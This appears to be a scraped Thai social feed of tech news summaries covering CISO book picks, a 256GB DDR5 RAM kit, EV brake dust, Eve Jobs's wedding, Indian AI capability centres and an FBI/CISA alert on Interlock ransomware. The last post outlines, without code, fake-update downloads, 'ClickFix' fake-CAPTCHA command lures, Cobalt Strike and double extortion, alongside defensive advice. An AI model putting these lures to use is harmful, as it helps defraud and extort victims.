    ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ

    ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ
    ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน
    การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา

    หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต

    Our Town โดย Thornton Wilder
    เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์
    ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน

    The Alchemist โดย Paulo Coelho
    เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต
    สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม

    Get Out of I.T. While You Can โดย Craig Schiefelbein
    ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน
    กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค

    https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    📚 เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์ ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ? คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์ สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง 📙📖 หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง ⭕ ✅ How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen ➡️ เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix ➡️ ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake ✅ Superforecasting โดย Philip Tetlock & Dan Gardner ➡️ เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ ➡️ มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ ⭐📖 หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ ⭕ ✅ Thinking, Fast and Slow โดย Daniel Kahneman ➡️ อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2) ➡️ ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ ✅ Noise โดย Kahneman และทีม ➡️ วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน” ➡️ เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์ ✅ Yeah, But โดย Marc Wolfe ➡️ ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง ➡️ ส่งเสริมความชัดเจนในการคิดและการนำทีม ✅ Digital Minimalism โดย Cal Newport ➡️ ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ ➡️ ช่วยปกป้องเวลาและความสนใจของผู้นำ ✅ Better Than Before โดย Gretchen Rubin ➡️ เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน 🙎‍♂️📖 หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์ ⭕ ✅ The Art of Deception โดย Kevin Mitnick ➡️ เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์ ➡️ ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน ✅ Secrets and Lies โดย Bruce Schneier ➡️ อธิบายความซับซ้อนของความปลอดภัยดิจิทัล ➡️ เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี ✅ Human Hacked โดย Len Noe ➡️ เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์ ➡️ เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี ‼️ ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย ⛔ องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์ ⛔ การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น 🔝📖 หนังสือที่ช่วยพัฒนาภาวะผู้นำ ⭕ ✅ Dare to Lead โดย Brené Brown ➡️ เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น ➡️ ส่งเสริมวัฒนธรรมองค์กรที่เปิดกว้างและรับผิดชอบ ✅ Radical Candor โดย Kim Scott ➡️ เสนอกรอบการให้ feedback ที่ตรงไปตรงมาแต่มีความเห็นอกเห็นใจ ➡️ ช่วยสร้างวัฒนธรรมการสื่อสารที่มีประสิทธิภาพ ‼️ ความเสี่ยงจากการเป็นผู้นำที่ขาดความเห็นอกเห็นใจ ⛔ ผู้นำที่เน้นเทคนิคแต่ละเลยมนุษย์อาจสร้างทีมที่ไม่ยั่งยืน ⛔ การขาด feedback ที่มีคุณภาพทำให้ทีมขาดการพัฒนา 🔎📖 หนังสือที่เตือนให้กลับมาโฟกัสกับชีวิต ⭕ ✅ Our Town โดย Thornton Wilder ➡️ เตือนให้เห็นคุณค่าของชีวิตประจำวันและความสัมพันธ์ ➡️ ช่วยให้ผู้นำกลับมาโฟกัสกับสิ่งสำคัญนอกเหนือจากงาน ✅ The Alchemist โดย Paulo Coelho ➡️ เรื่องราวการเดินทางตามความฝันที่เต็มไปด้วยบทเรียนชีวิต ➡️ สะท้อนความกล้าหาญในการเลือกเส้นทางที่ไม่เป็นไปตามกรอบเดิม ✅ Get Out of I.T. While You Can โดย Craig Schiefelbein ➡️ ท้าทายให้ผู้นำไอทีทบทวนบทบาทและคุณค่าของตน ➡️ กระตุ้นให้สร้างผลกระทบเชิงกลยุทธ์มากกว่าการทำงานเชิงเทคนิค https://www.csoonline.com/article/4027000/the-books-shaping-todays-cybersecurity-leaders.html
    WWW.CSOONLINE.COM
    The books shaping today’s cybersecurity leaders
    Cybersecurity leaders reveal the books that have influenced how they lead, think, and manage security in the enterprise — and their own lives.
    0 ความคิดเห็น 0 การแบ่งปัน 208 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “แรม 256GB” ไม่ใช่แค่เยอะ…แต่มันคือพลังของยุค AI

    ลองจินตนาการว่าคุณกำลังตัดต่อวิดีโอ 8K พร้อมกับรันโมเดล AI และเปิดเกม AAA ไปด้วย — ถ้าเครื่องคุณยังใช้แรม 32GB หรือ 64GB อาจจะถึงเวลาอัปเกรดแล้ว เพราะ TeamGroup เพิ่งเปิดตัว “แรม DDR5 ความจุ 256GB” แบบ Quad-Channel ที่ออกแบบมาเพื่อรองรับงานหนักระดับเทพโดยเฉพาะ

    ภายใต้แบรนด์ T-FORCE และ T-CREATE มีสองรุ่นให้เลือก:
    - T-FORCE DELTA RGB DDR5-6000 CL32 สำหรับสายเกมเมอร์ที่ต้องการทั้งความเร็วและความสวยงาม
    - T-CREATE EXPERT DDR5-5600 CL42 สำหรับสายครีเอเตอร์ที่เน้นความเสถียรและประสิทธิภาพระยะยาว

    ทั้งสองรุ่นใช้โมดูล 64GB จำนวน 4 ตัว รวมเป็น 256GB และผ่านการทดสอบกับแพลตฟอร์ม AMD X870 ซึ่งรองรับ Ryzen 9000 Series ได้อย่างสมบูรณ์

    สาระจากข่าว
    TeamGroup เปิดตัวแรม DDR5 ความจุ 256GB
    ใช้โมดูล 64GB จำนวน 4 ตัวในชุด Quad-Channel
    มีสองซีรีส์: T-FORCE สำหรับเกมเมอร์ และ T-CREATE สำหรับครีเอเตอร์

    T-FORCE DELTA RGB DDR5-6000 CL32
    ความเร็วสูงสุด 6000 MT/s พร้อม latency ต่ำ CL32
    รองรับ AMD EXPO สำหรับการโอเวอร์คล็อกผ่าน BIOS
    มีไฟ RGB และฮีตซิงก์ดีไซน์สวยงาม

    T-CREATE EXPERT DDR5-5600 CL42
    ความเร็ว 5600 MT/s พร้อม latency CL42
    ไม่มี RGB เน้นดีไซน์เรียบง่ายและความเสถียร
    เหมาะสำหรับงานหนัก เช่น 3D rendering, video editing, AI workloads

    ผ่านการทดสอบกับ AMD X870 platform
    รองรับ Ryzen 9000 Series และเมนบอร์ดรุ่นใหม่
    เพิ่มความมั่นใจในความเข้ากันได้และเสถียรภาพ

    เตรียมวางจำหน่ายทั่วโลกในเดือนกันยายน 2025
    ยังไม่เปิดเผยราคา แต่คาดว่าจะสูงตามความจุและสเปก

    https://wccftech.com/teamgroup-shows-off-its-ultra-capacity-256gb-quad-channel-ddr5-memory-kit-for-intensive-workloads/
    🧠 เรื่องเล่าจากข่าว: “แรม 256GB” ไม่ใช่แค่เยอะ…แต่มันคือพลังของยุค AI ลองจินตนาการว่าคุณกำลังตัดต่อวิดีโอ 8K พร้อมกับรันโมเดล AI และเปิดเกม AAA ไปด้วย — ถ้าเครื่องคุณยังใช้แรม 32GB หรือ 64GB อาจจะถึงเวลาอัปเกรดแล้ว เพราะ TeamGroup เพิ่งเปิดตัว “แรม DDR5 ความจุ 256GB” แบบ Quad-Channel ที่ออกแบบมาเพื่อรองรับงานหนักระดับเทพโดยเฉพาะ ภายใต้แบรนด์ T-FORCE และ T-CREATE มีสองรุ่นให้เลือก: - T-FORCE DELTA RGB DDR5-6000 CL32 สำหรับสายเกมเมอร์ที่ต้องการทั้งความเร็วและความสวยงาม - T-CREATE EXPERT DDR5-5600 CL42 สำหรับสายครีเอเตอร์ที่เน้นความเสถียรและประสิทธิภาพระยะยาว ทั้งสองรุ่นใช้โมดูล 64GB จำนวน 4 ตัว รวมเป็น 256GB และผ่านการทดสอบกับแพลตฟอร์ม AMD X870 ซึ่งรองรับ Ryzen 9000 Series ได้อย่างสมบูรณ์ ✅ สาระจากข่าว ✅ TeamGroup เปิดตัวแรม DDR5 ความจุ 256GB ➡️ ใช้โมดูล 64GB จำนวน 4 ตัวในชุด Quad-Channel ➡️ มีสองซีรีส์: T-FORCE สำหรับเกมเมอร์ และ T-CREATE สำหรับครีเอเตอร์ ✅ T-FORCE DELTA RGB DDR5-6000 CL32 ➡️ ความเร็วสูงสุด 6000 MT/s พร้อม latency ต่ำ CL32 ➡️ รองรับ AMD EXPO สำหรับการโอเวอร์คล็อกผ่าน BIOS ➡️ มีไฟ RGB และฮีตซิงก์ดีไซน์สวยงาม ✅ T-CREATE EXPERT DDR5-5600 CL42 ➡️ ความเร็ว 5600 MT/s พร้อม latency CL42 ➡️ ไม่มี RGB เน้นดีไซน์เรียบง่ายและความเสถียร ➡️ เหมาะสำหรับงานหนัก เช่น 3D rendering, video editing, AI workloads ✅ ผ่านการทดสอบกับ AMD X870 platform ➡️ รองรับ Ryzen 9000 Series และเมนบอร์ดรุ่นใหม่ ➡️ เพิ่มความมั่นใจในความเข้ากันได้และเสถียรภาพ ✅ เตรียมวางจำหน่ายทั่วโลกในเดือนกันยายน 2025 ➡️ ยังไม่เปิดเผยราคา แต่คาดว่าจะสูงตามความจุและสเปก https://wccftech.com/teamgroup-shows-off-its-ultra-capacity-256gb-quad-channel-ddr5-memory-kit-for-intensive-workloads/
    WCCFTECH.COM
    TeamGroup Shows Off Its Ultra-Capacity 256GB Quad-Channel DDR5 Memory Kit For Intensive Workloads
    TeamGroup has unveiled its new lineup of ultra high-capacity DDR5 memory under the T-Force and T-Create series, bringing 256 GB DDR5 RAM kits.
    0 ความคิดเห็น 0 การแบ่งปัน 139 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเบรกที่ไม่ปล่อยฝุ่น: เมื่อรถยนต์ไฟฟ้าช่วยให้เมืองหายใจสะอาดขึ้น

    งานวิจัยจาก EIT Urban Mobility ที่สำรวจในลอนดอน, มิลาน และบาร์เซโลนา พบว่า:
    - รถยนต์ไฟฟ้าลดฝุ่นเบรกได้ถึง 83%
    - ฝุ่นเบรกเป็นแหล่ง PM10 ที่สำคัญในเมือง โดยคิดเป็น 55% ของมลพิษจากการจราจรที่ไม่ใช่ไอเสีย
    - ฝุ่นเหล่านี้มีขนาดเล็กกว่า 10 ไมครอน และบางครั้งต่ำกว่า 100 นาโนเมตร — สามารถเข้าสู่ปอดลึกและก่อให้เกิดการอักเสบ

    เทคโนโลยีเบื้องหลังคือ regenerative braking:
    - ใช้มอเตอร์หมุนย้อนกลับเพื่อชะลอรถ และเปลี่ยนพลังงานกลับไปเก็บในแบตเตอรี่
    - ลดการใช้เบรกแบบแรงเสียดทานลงครึ่งหนึ่ง
    - ยืดอายุแบตเตอรี่และลดการปล่อยฝุ่นโลหะ เช่น ทองแดง, เหล็ก, สังกะสี

    แม้จะมีข้อกังวลเรื่องน้ำหนักของ BEVs ที่อาจทำให้ยางสึกเร็วขึ้น แต่การศึกษาพบว่า:
    - ฝุ่นจากเบรกมีแนวโน้มฟุ้งกระจายมากกว่าฝุ่นจากยาง
    - เมื่อรวมฝุ่นจากยาง, เบรก และพื้นถนน BEVs ยังปล่อยฝุ่นน้อยกว่ารถน้ำมันถึง 38% — ยังไม่รวมการไม่มีท่อไอเสีย

    ผลกระทบเชิงสุขภาพ:
    - ฝุ่นเบรกที่มีทองแดงสูงก่อให้เกิด oxidative stress เทียบเท่าหรือมากกว่าฝุ่นดีเซล
    - ส่งผลต่อผู้มีรายได้น้อยในเมือง ซึ่งมักอยู่ในพื้นที่ที่มีมลพิษสูง
    - แสดงถึงความจำเป็นในการเข้าถึงรถสะอาดอย่างเท่าเทียม

    นโยบายในอนาคต:
    - Euro 7 เตรียมออกมาตรฐานใหม่สำหรับฝุ่นจากเบรกและยาง
    - ผู้ผลิตเริ่มใช้เบรกแบบ enclosed drum และยางสูตรลดการสึกหรอ
    - การเปลี่ยนจากรถส่วนตัวไปสู่ระบบขนส่งสาธารณะจะลดฝุ่นได้ถึง 5 เท่า

    https://modernengineeringmarvels.com/2025/07/22/surprising-science-how-electric-cars-quietly-transform-urban-air/
    🎙️ เรื่องเล่าจากเบรกที่ไม่ปล่อยฝุ่น: เมื่อรถยนต์ไฟฟ้าช่วยให้เมืองหายใจสะอาดขึ้น งานวิจัยจาก EIT Urban Mobility ที่สำรวจในลอนดอน, มิลาน และบาร์เซโลนา พบว่า: - รถยนต์ไฟฟ้าลดฝุ่นเบรกได้ถึง 83% - ฝุ่นเบรกเป็นแหล่ง PM10 ที่สำคัญในเมือง โดยคิดเป็น 55% ของมลพิษจากการจราจรที่ไม่ใช่ไอเสีย - ฝุ่นเหล่านี้มีขนาดเล็กกว่า 10 ไมครอน และบางครั้งต่ำกว่า 100 นาโนเมตร — สามารถเข้าสู่ปอดลึกและก่อให้เกิดการอักเสบ เทคโนโลยีเบื้องหลังคือ regenerative braking: - ใช้มอเตอร์หมุนย้อนกลับเพื่อชะลอรถ และเปลี่ยนพลังงานกลับไปเก็บในแบตเตอรี่ - ลดการใช้เบรกแบบแรงเสียดทานลงครึ่งหนึ่ง - ยืดอายุแบตเตอรี่และลดการปล่อยฝุ่นโลหะ เช่น ทองแดง, เหล็ก, สังกะสี แม้จะมีข้อกังวลเรื่องน้ำหนักของ BEVs ที่อาจทำให้ยางสึกเร็วขึ้น แต่การศึกษาพบว่า: - ฝุ่นจากเบรกมีแนวโน้มฟุ้งกระจายมากกว่าฝุ่นจากยาง - เมื่อรวมฝุ่นจากยาง, เบรก และพื้นถนน BEVs ยังปล่อยฝุ่นน้อยกว่ารถน้ำมันถึง 38% — ยังไม่รวมการไม่มีท่อไอเสีย ผลกระทบเชิงสุขภาพ: - ฝุ่นเบรกที่มีทองแดงสูงก่อให้เกิด oxidative stress เทียบเท่าหรือมากกว่าฝุ่นดีเซล - ส่งผลต่อผู้มีรายได้น้อยในเมือง ซึ่งมักอยู่ในพื้นที่ที่มีมลพิษสูง - แสดงถึงความจำเป็นในการเข้าถึงรถสะอาดอย่างเท่าเทียม นโยบายในอนาคต: - Euro 7 เตรียมออกมาตรฐานใหม่สำหรับฝุ่นจากเบรกและยาง - ผู้ผลิตเริ่มใช้เบรกแบบ enclosed drum และยางสูตรลดการสึกหรอ - การเปลี่ยนจากรถส่วนตัวไปสู่ระบบขนส่งสาธารณะจะลดฝุ่นได้ถึง 5 เท่า https://modernengineeringmarvels.com/2025/07/22/surprising-science-how-electric-cars-quietly-transform-urban-air/
    MODERNENGINEERINGMARVELS.COM
    Surprising Science: How Electric Cars Quietly Transform Urban Air
    “It’s not just the tailpipe y’all,” joked one Electrek commenter, alluding to the black discolorations on alloy wheels visible proof of a less infamous city pollutant: brake dust. For d…
    0 ความคิดเห็น 0 การแบ่งปัน 153 มุมมอง 0 รีวิว
  • เรื่องเล่าจากงานแต่งที่ไม่ใช่แค่เรื่องรัก: เมื่อลูกสาว Steve Jobs จัดงานแต่งที่สะท้อนทั้ง Silicon Valley และความหรูหราแบบอังกฤษ

    Eve Jobs วัย 27 ปี แม้จะเป็นทายาทของบุคคลที่เปลี่ยนโลกเทคโนโลยี แต่เธอเลือกเดินเส้นทางของตัวเองในวงการแฟชั่น และหลีกเลี่ยงการใช้ชื่อเสียงของพ่อเพื่อเข้าสู่วงการไอที

    งานแต่งของเธอกับ Harry Charles นักกีฬาขี่ม้าทีมชาติอังกฤษ จะจัดขึ้นใน Oxfordshire ประเทศอังกฤษ โดยมี:
    - งบประมาณกว่า $6.7 ล้าน
    - ผู้จัดงานคือ Stanlee Gatti นักออกแบบงานอีเวนต์ชื่อดังจากแคลิฟอร์เนีย
    - คาดว่าจะมีการตกแต่งด้วยดอกไม้ immersive, สวนเทียน, และบรรยากาศแบบเทพนิยาย

    แขกที่ได้รับเชิญ ได้แก่:
    - Elton John (แสดงสด)
    - Kamala Harris (อดีตรองประธานาธิบดีสหรัฐฯ)
    - เจ้าหญิง Beatrice
    - Jessica Springsteen
    - Jennifer และ Phoebe Gates
    - Matt Helders (Arctic Monkeys)

    แม้หลายคนจะคิดว่า Eve ใช้เงินจากมรดกของ Steve Jobs แต่ Laurene Powell Jobs แม่ของเธอเคยประกาศชัดว่าไม่เชื่อใน “การส่งต่อความมั่งคั่ง” และจะใช้ทรัพย์สินเพื่อสนับสนุนงานการกุศลแทน

    งานแต่งนี้จึงสะท้อนว่า Eve กำลัง “นิยามใหม่” ของการสืบทอดชื่อ Jobs — ไม่ใช่ด้วยเทคโนโลยี แต่ด้วยความคิดสร้างสรรค์และความสง่างามในแบบของเธอเอง

    https://wccftech.com/steve-jobs-daughter-to-host-6-7m-high-profile-tech-wedding-elton-john-performing-kamala-harris-attending-and-oxfordshire-bracing-for-a-star-studded-affair/
    🎙️ เรื่องเล่าจากงานแต่งที่ไม่ใช่แค่เรื่องรัก: เมื่อลูกสาว Steve Jobs จัดงานแต่งที่สะท้อนทั้ง Silicon Valley และความหรูหราแบบอังกฤษ Eve Jobs วัย 27 ปี แม้จะเป็นทายาทของบุคคลที่เปลี่ยนโลกเทคโนโลยี แต่เธอเลือกเดินเส้นทางของตัวเองในวงการแฟชั่น และหลีกเลี่ยงการใช้ชื่อเสียงของพ่อเพื่อเข้าสู่วงการไอที งานแต่งของเธอกับ Harry Charles นักกีฬาขี่ม้าทีมชาติอังกฤษ จะจัดขึ้นใน Oxfordshire ประเทศอังกฤษ โดยมี: - งบประมาณกว่า $6.7 ล้าน - ผู้จัดงานคือ Stanlee Gatti นักออกแบบงานอีเวนต์ชื่อดังจากแคลิฟอร์เนีย - คาดว่าจะมีการตกแต่งด้วยดอกไม้ immersive, สวนเทียน, และบรรยากาศแบบเทพนิยาย แขกที่ได้รับเชิญ ได้แก่: - Elton John (แสดงสด) - Kamala Harris (อดีตรองประธานาธิบดีสหรัฐฯ) - เจ้าหญิง Beatrice - Jessica Springsteen - Jennifer และ Phoebe Gates - Matt Helders (Arctic Monkeys) แม้หลายคนจะคิดว่า Eve ใช้เงินจากมรดกของ Steve Jobs แต่ Laurene Powell Jobs แม่ของเธอเคยประกาศชัดว่าไม่เชื่อใน “การส่งต่อความมั่งคั่ง” และจะใช้ทรัพย์สินเพื่อสนับสนุนงานการกุศลแทน งานแต่งนี้จึงสะท้อนว่า Eve กำลัง “นิยามใหม่” ของการสืบทอดชื่อ Jobs — ไม่ใช่ด้วยเทคโนโลยี แต่ด้วยความคิดสร้างสรรค์และความสง่างามในแบบของเธอเอง https://wccftech.com/steve-jobs-daughter-to-host-6-7m-high-profile-tech-wedding-elton-john-performing-kamala-harris-attending-and-oxfordshire-bracing-for-a-star-studded-affair/
    WCCFTECH.COM
    Steve Jobs’ Daughter To Host $6.7M High-Profile Tech Wedding - Elton John Performing, Kamala Harris Attending, And Oxfordshire Bracing For A Star-Studded Affair
    Eve Jobs, daughter of Apple's co-founder Steve Jobs is grabbing headlines for tying the knot in rather lavish wedding affair
    0 ความคิดเห็น 0 การแบ่งปัน 172 มุมมอง 0 รีวิว
  • เรื่องเล่าจากศูนย์กลางใหม่ของ AI: เมื่ออินเดียกลายเป็น “สมองส่วนกลาง” ของบริษัทระดับโลก

    อินเดียเคยถูกมองว่าเป็นแหล่ง “แรงงานราคาถูก” สำหรับงาน back-office แต่ตอนนี้ GCCs กลายเป็นศูนย์กลางด้าน AI ที่มีบทบาทสำคัญ เช่น:
    - วิเคราะห์ข้อมูลจากอุปกรณ์อุตสาหกรรม
    - แนะนำสินค้าแบบ personalized
    - ควบคุมระบบจากระยะไกล เช่น ตู้เย็นของ Tesco ทั่วโลก

    Tesco เป็นตัวอย่างชัดเจน: จากเดิมที่ใช้ศูนย์ Bengaluru เพื่อลดต้นทุน ตอนนี้มีพนักงาน 5,000 คนที่ใช้ AI วิเคราะห์อุณหภูมิตู้เย็นทั่วโลก และช่วยลดการสูญเสียอาหารได้หลายล้านปอนด์ต่อปี

    บริษัทอย่าง McDonald’s และ Bupa กำลังตั้ง GCCs เพื่อรับมือกับปัญหาการจ้างงานด้าน AI ในตลาดตะวันตกที่มีต้นทุนสูงและบุคลากรขาดแคลน

    แม้อินเดียจะยังตามหลังสหรัฐฯ และจีนในด้านนวัตกรรม AI แต่ GCCs สามารถใช้โมเดลจากบริษัทแม่ เช่น LLMs และเครื่องมือวิเคราะห์ขั้นสูง เพื่อสร้างคุณค่าใหม่กลับไปยังสำนักงานใหญ่

    การเติบโตของ GCCs:
    - รายได้จาก back-office เพิ่มจาก $11.5B ในปี 2010 เป็น $65B ในปี 2021
    - พนักงานเพิ่มจาก 400,000 เป็น 1.8 ล้านคน
    - คาดว่าจะถึง $100B ในปี 2030
    - งานด้าน R&D เพิ่มจาก 45% เป็น 55% ของรายได้ในช่วง 8 ปี

    รัฐ Karnataka ซึ่งมี GCCs มากที่สุดในอินเดีย (40%) กำลังผลักดันให้ประเทศกลายเป็น “ระบบนิเวศแห่งนวัตกรรม” ไม่ใช่แค่ผู้ให้บริการ

    https://www.techspot.com/news/108762-ai-hiring-woes-pushing-companies-like-mcdonald-bupa.html
    🎙️ เรื่องเล่าจากศูนย์กลางใหม่ของ AI: เมื่ออินเดียกลายเป็น “สมองส่วนกลาง” ของบริษัทระดับโลก อินเดียเคยถูกมองว่าเป็นแหล่ง “แรงงานราคาถูก” สำหรับงาน back-office แต่ตอนนี้ GCCs กลายเป็นศูนย์กลางด้าน AI ที่มีบทบาทสำคัญ เช่น: - วิเคราะห์ข้อมูลจากอุปกรณ์อุตสาหกรรม - แนะนำสินค้าแบบ personalized - ควบคุมระบบจากระยะไกล เช่น ตู้เย็นของ Tesco ทั่วโลก Tesco เป็นตัวอย่างชัดเจน: จากเดิมที่ใช้ศูนย์ Bengaluru เพื่อลดต้นทุน ตอนนี้มีพนักงาน 5,000 คนที่ใช้ AI วิเคราะห์อุณหภูมิตู้เย็นทั่วโลก และช่วยลดการสูญเสียอาหารได้หลายล้านปอนด์ต่อปี บริษัทอย่าง McDonald’s และ Bupa กำลังตั้ง GCCs เพื่อรับมือกับปัญหาการจ้างงานด้าน AI ในตลาดตะวันตกที่มีต้นทุนสูงและบุคลากรขาดแคลน แม้อินเดียจะยังตามหลังสหรัฐฯ และจีนในด้านนวัตกรรม AI แต่ GCCs สามารถใช้โมเดลจากบริษัทแม่ เช่น LLMs และเครื่องมือวิเคราะห์ขั้นสูง เพื่อสร้างคุณค่าใหม่กลับไปยังสำนักงานใหญ่ การเติบโตของ GCCs: - รายได้จาก back-office เพิ่มจาก $11.5B ในปี 2010 เป็น $65B ในปี 2021 - พนักงานเพิ่มจาก 400,000 เป็น 1.8 ล้านคน - คาดว่าจะถึง $100B ในปี 2030 - งานด้าน R&D เพิ่มจาก 45% เป็น 55% ของรายได้ในช่วง 8 ปี รัฐ Karnataka ซึ่งมี GCCs มากที่สุดในอินเดีย (40%) กำลังผลักดันให้ประเทศกลายเป็น “ระบบนิเวศแห่งนวัตกรรม” ไม่ใช่แค่ผู้ให้บริการ https://www.techspot.com/news/108762-ai-hiring-woes-pushing-companies-like-mcdonald-bupa.html
    WWW.TECHSPOT.COM
    AI hiring woes are pushing some companies like McDonald's and Bupa to India's "tech hubs"
    The movement is not simply a play for lower labor costs; it reflects an escalating need for advanced AI abilities that are in short supply at home...
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง

    Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า:
    - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux
    - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ

    เทคนิคที่ใช้มีความแปลกใหม่ เช่น:
    - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client
    - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ

    เมื่อเข้าระบบได้แล้ว Interlock จะ:
    - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ
    - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์
    - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock
    - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน
    - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง

    FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น:
    - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย
    - อัปเดตระบบและซอฟต์แวร์ทั้งหมด
    - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด
    - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย
    - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup)

    FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ
    ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล

    Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM
    ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix

    ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง
    เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ

    หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล
    รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์

    ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock
    โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor

    หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable
    พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware

    https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
